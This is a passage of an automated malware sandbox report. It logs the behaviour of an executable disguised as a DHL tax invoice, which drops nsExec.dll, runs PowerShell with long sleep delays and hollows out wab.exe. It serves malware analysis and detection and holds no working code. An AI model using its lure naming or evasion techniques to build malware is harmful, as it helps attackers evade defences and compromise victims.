              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6831Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2894Jump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7896Thread sleep time: -35000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wab.exe, 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0=
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3431
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3611
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_006ED6E0 LdrInitializeThunk,1_2_006ED6E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sample uses process hollowing technique
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
